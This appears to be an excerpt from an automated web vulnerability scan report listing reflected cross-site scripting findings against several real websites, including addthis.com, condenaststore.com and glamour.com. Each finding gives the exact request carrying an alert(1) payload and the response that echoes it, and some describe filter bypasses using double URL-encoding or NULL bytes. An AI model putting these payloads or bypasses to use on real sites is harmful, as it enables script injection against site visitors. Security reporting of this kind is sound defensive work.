<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCIN/refurb_free_111710/refurb_free_300x250_111710.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/245726341/http:f36ee';c912024fbc2;ai.191305088;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/245726341/http:f36ee';c912024fbc2;ai.191305088;ct.1/01" />
...[SNIP]...

1.105. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75cff<script>alert(1)</script>312333520f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php75cff<script>alert(1)</script>312333520f9 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 29 Nov 2010 16:46:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=f1bbp0rhdgtqpb8sms484e65k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php75cff<script>alert(1)</script>312333520f9</strong>
...[SNIP]...

1.106. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47262"-alert(1)-"fed9ac5aab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php47262"-alert(1)-"fed9ac5aab5 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 29 Nov 2010 16:46:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ioqvsop0i6c01q0mi5unhpk7j0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php47262"-alert(1)-"fed9ac5aab5";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.107. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ead"-alert(1)-"2cf875222dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/c7ead"-alert(1)-"2cf875222dd HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:46:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/c7ead"-alert(1)-"2cf875222dd";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.108. http://www.addthis.com/bookmark.php [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2730"%20style%3dx%3aexpression(alert(1))%20c264a0aa9c5 was submitted in the pub parameter. This input was echoed as c2730\" style=x:expression(alert(1)) c264a0aa9c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?pub=vanityfairc2730"%20style%3dx%3aexpression(alert(1))%20c264a0aa9c5&url=http%3a%2f%2fwww.vanityfair.com%252Fservices%252Fprivacypolicy&title=+Privacy+Policy%3a+vanityfair.com HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:17:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="vanityfairc2730\" style=x:expression(alert(1)) c264a0aa9c5" />
...[SNIP]...

1.109. http://www.addthis.com/bookmark.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c56bc98269 was submitted in the url parameter. This input was echoed as be8cf"><script>alert(1)</script>8c56bc98269 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php?pub=vanityfair&url=http%3a%2f%2fwww.vanityfair.com%252Fservices%252Fprivacypolicybe8cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c56bc98269&title=+Privacy+Policy%3a+vanityfair.com HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:18:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.vanityfair.com/services/privacypolicybe8cf"><script>alert(1)</script>8c56bc98269" />
...[SNIP]...

1.110. http://www.addthis.com/bookmark.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 33f95%253ca%2520b%253dc%253ea71e09fee51 was submitted in the url parameter. This input was echoed as 33f95<a b=c>a71e09fee51 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php?pub=vanityfair&url=http%3a%2f%2fwww.vanityfair.com%252Fservices%252Fprivacypolicy33f95%253ca%2520b%253dc%253ea71e09fee51&title=+Privacy+Policy%3a+vanityfair.com HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:18:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<span class="link">http://www.vanityfair.com/services/privacypolicy33f95<a b=c>a71e09fee51</span>
...[SNIP]...

1.111. http://www.angermanagementusa.com/anger-management-Vermont.php/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.angermanagementusa.com
Path:   /anger-management-Vermont.php/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac9f6"><script>alert(1)</script>520ec690520 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /anger-management-Vermont.php/x22ac9f6"><script>alert(1)</script>520ec690520 HTTP/1.1
Host: www.angermanagementusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:21:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Anger Ma
...[SNIP]...
<form id="contacts-form" method="post" action="/anger-management-Vermont.php/x22ac9f6"><script>alert(1)</script>520ec690520" onSubmit="return check_contact_form('contacts-form')">
...[SNIP]...

1.112. https://www.condenaststore.com/bin/venda [cntry parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.condenaststore.com
Path:   /bin/venda

Issue detail

The value of the cntry request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d61ec'-alert(1)-'64162f0bd181d3ace was submitted in the cntry parameter. This input was echoed as d61ec'-alert(1)-'64162f0bd181d3ace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bin/venda?ex=co_wizr-register&step=--page-myaccount&mode=process&param1=details&param2=uk&param3=%0d&check=yes&trrfnbr=38208&wizard=%0d&trrfext=1&curstep=billto&workflowid=register_14&curparam1=details&bsref=condenaststore&layout=%0d&uslgemail=%0d&ustype=R&title=Mr&fname=%27&lname=%27&company=%0d&addr1=%27&addr2=%27&city=%27&statelist=AK&state=AK&zipc=10010&cntry=%2500d61ec%27-alert%281%29-%2764162f0bd181d3ace&area=000000&phone=000000&usemail=test@fastdial.net&usmailform=3&ustandc=1&uspswd=%27&uspswd2=%27&usxtdobmonth=%0d&usxtdobday=%0d&usxtdobyear=%0d&usxtindustry=%0d&usxtshoppingfor=%0d HTTP/1.1
Host: www.condenaststore.com
Connection: keep-alive
Referer: https://www.condenaststore.com/bin/venda?ex=co_wizr-register&bsref=condenaststore&step=billto&param1=details&glxt=L3f60z4YlAeLd5JS6MK8FsqfqaRn%2B%2FcV4wJgLX8zLzayg5i05NuOCkV6HFz1CN07i%2BPfltEiW1To%0AxxM%2FTSky2g%3D%3D&log=2&userEmail=test@fastdial.net
Cache-Control: max-age=0
Origin: https://www.condenaststore.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SID=ce1bbb293dc739a4d2e19ef52614e2ac; quench=VZ803; httprefer=www.vanityfair.com; __utmz=265625501.1291054332.2.2.utmcsr=vanityfair.com|utmccn=(not%20set)|utmcmd=referral|utmcct=topnav; ysm_CK1HISMCFRDTRU91EGP1NDKA7745K=ysm_PV1HISMCFRDTRU91EGP1NDKA7745K:2&ysm_SN1HISMCFRDTRU91EGP1NDKA7745K:1291051745523&ysm_LD1HISMCFRDTRU91EGP1NDKA7745K:0; __utma=265625501.692421296.1291051746.1291051746.1291054332.2; __utmc=265625501; __utmb=265625501.2.10.1291054332; lang=ae; RFID=38208%3Awx4mbmlWzYrMu96aMExzfg

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
X-UA-Compatible: IE=EmulateIE7
Expires: Mon, 29 Nov 2010 17:24:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 29 Nov 2010 17:24:24 GMT
Connection: keep-alive
Set-Cookie: lang=ae; domain=www.condenaststore.com; path=/; expires=Mon, 15-Nov-15 05:29:10 GMT
Content-Length: 72538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Billing Address at The Cond. Nast Store - Error(s) on page</tit
...[SNIP]...
.Checkout.jsContent != "undefined" || Venda.Platform.Checkout.jsContent) {
   Venda.Platform.Checkout.jsContent.create('statelistbox');
};
setDropDownDefault(document.getElementById("cntrylist"), '%00d61ec'-alert(1)-'64162f0bd181d3ace');
hasState(document.getElementById('statelistbox'),document.getElementById('statetextbox'),document.getElementById('statelist'),'%00d61ec'-alert(1)-'64162f0bd181d3ace');
setDropDownDefault(document
...[SNIP]...

1.113. https://www.condenaststore.com/bin/venda [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.condenaststore.com
Path:   /bin/venda

Issue detail

The value of the state request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %008bae0'-alert(1)-'dacd26ff9cd was submitted in the state parameter. This input was echoed as 8bae0'-alert(1)-'dacd26ff9cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /bin/venda HTTP/1.1
Host: www.condenaststore.com
Connection: keep-alive
Referer: https://www.condenaststore.com/bin/venda?ex=co_wizr-register&display=1&stashid=billto9e5ba3f6&workflowid=register_14&step=billto
Cache-Control: max-age=0
Origin: https://www.condenaststore.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysfqB8J3c9thtEa3C
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SID=ce1bbb293dc739a4d2e19ef52614e2ac; quench=VZ803; httprefer=www.vanityfair.com; __utmz=265625501.1291054332.2.2.utmcsr=vanityfair.com|utmccn=(not%20set)|utmcmd=referral|utmcct=topnav; ysm_CK1HISMCFRDTRU91EGP1NDKA7745K=ysm_PV1HISMCFRDTRU91EGP1NDKA7745K:2&ysm_SN1HISMCFRDTRU91EGP1NDKA7745K:1291051745523&ysm_LD1HISMCFRDTRU91EGP1NDKA7745K:0; __utma=265625501.692421296.1291051746.1291051746.1291054332.2; __utmc=265625501; __utmb=265625501.2.10.1291054332; RFID=38208%3Awx4mbmlWzYrMu96aMExzfg; lang=ae
Content-Length: 4067

------WebKitFormBoundarysfqB8J3c9thtEa3C
Content-Disposition: form-data; name="ex"

co_wizr-register
------WebKitFormBoundarysfqB8J3c9thtEa3C
Content-Disposition: form-data; name="step"

--page
...[SNIP]...

new york
------WebKitFormBoundarysfqB8J3c9thtEa3C
Content-Disposition: form-data; name="statelist"

NY
------WebKitFormBoundarysfqB8J3c9thtEa3C
Content-Disposition: form-data; name="state"

%008bae0'-alert(1)-'dacd26ff9cd
------WebKitFormBoundarysfqB8J3c9thtEa3C
Content-Disposition: form-data; name="zipc"

10010
------WebKitFormBoundarysfqB8J3c9thtEa3C
Content-Disposition: form-data; name="cntry"

United State
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
X-UA-Compatible: IE=EmulateIE7
Expires: Mon, 29 Nov 2010 17:23:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 29 Nov 2010 17:23:07 GMT
Connection: keep-alive
Set-Cookie: lang=ae; domain=www.condenaststore.com; path=/; expires=Mon, 15-Nov-15 05:29:10 GMT
Content-Length: 72563

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Billing Address at The Cond. Nast Store - Error(s) on page</tit
...[SNIP]...
ate(document.getElementById('statelistbox'),document.getElementById('statetextbox'),document.getElementById('statelist'),'United States');
setDropDownDefault(document.getElementById("statelist"), '%008bae0'-alert(1)-'dacd26ff9cd');
</script>
...[SNIP]...

1.114. http://www.divorce4her.com/entr/states/massachusetts.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.divorce4her.com
Path:   /entr/states/massachusetts.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad982<script>alert(1)</script>0ce4eedbac4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /entrad982<script>alert(1)</script>0ce4eedbac4/states/massachusetts.html HTTP/1.1
Host: www.divorce4her.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2010 17:22:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 1616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>Page Not Available</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
<BODY bg
...[SNIP]...
<br>
174.122.23.218 tried to load www.divorce4her.com/entrad982<script>alert(1)</script>0ce4eedbac4/states/massachusetts.html <br>
...[SNIP]...

1.115. http://www.divorce4her.com/entr/states/massachusetts.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.divorce4her.com
Path:   /entr/states/massachusetts.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f0e1<script>alert(1)</script>11c6447f120 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /entr/states6f0e1<script>alert(1)</script>11c6447f120/massachusetts.html HTTP/1.1
Host: www.divorce4her.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2010 17:22:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 1616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>Page Not Available</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
<BODY bg
...[SNIP]...
<br>
174.122.23.218 tried to load www.divorce4her.com/entr/states6f0e1<script>alert(1)</script>11c6447f120/massachusetts.html <br>
...[SNIP]...

1.116. http://www.divorce4her.com/entr/states/massachusetts.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.divorce4her.com
Path:   /entr/states/massachusetts.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 66e25<script>alert(1)</script>1dc83bd1013 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /entr/states/massachusetts.html66e25<script>alert(1)</script>1dc83bd1013 HTTP/1.1
Host: www.divorce4her.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2010 17:22:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 1616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>Page Not Available</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
<BODY bg
...[SNIP]...
<br>
174.122.23.218 tried to load www.divorce4her.com/entr/states/massachusetts.html66e25<script>alert(1)</script>1dc83bd1013 <br>
...[SNIP]...

1.117. http://www.glamour.com/women-of-the-year/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.glamour.com
Path:   /women-of-the-year/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66a83'%3b599030adafd was submitted in the REST URL parameter 1. This input was echoed as 66a83';599030adafd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women-of-the-year66a83'%3b599030adafd/ HTTP/1.1
Host: www.glamour.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mobify=0;

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.6
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:32:49 GMT
Date: Mon, 29 Nov 2010 17:22:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
<!--

CN.dart.init({site:'glamour.dart', zone: 'women_of_the_year66a83';599030adafd;', kws:[ "women-of-the-year66a83'","599030adafd"], charmap : {' ' : '+', '-' : '_'}});
//-->
...[SNIP]...

1.118. http://www.glamour.com/women-of-the-year/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.glamour.com
Path:   /women-of-the-year/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cdc9d<img%20src%3da%20onerror%3dalert(1)>e4fdf758ccb was submitted in the REST URL parameter 1. This input was echoed as cdc9d<img src=a onerror=alert(1)>e4fdf758ccb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /women-of-the-yearcdc9d<img%20src%3da%20onerror%3dalert(1)>e4fdf758ccb/ HTTP/1.1
Host: www.glamour.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mobify=0;

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.6
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:32:52 GMT
Date: Mon, 29 Nov 2010 17:22:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49647


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
<span>women-of-the-yearcdc9d<img src=a onerror=alert(1)>e4fdf758ccb</span>
...[SNIP]...

1.119. http://www.glamour.com/women-of-the-year/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.glamour.com
Path:   /women-of-the-year/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d5b9"><script>alert(1)</script>7809d4f0ec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /women-of-the-year/?5d5b9"><script>alert(1)</script>7809d4f0ec7=1 HTTP/1.1
Host: www.glamour.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mobify=0;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
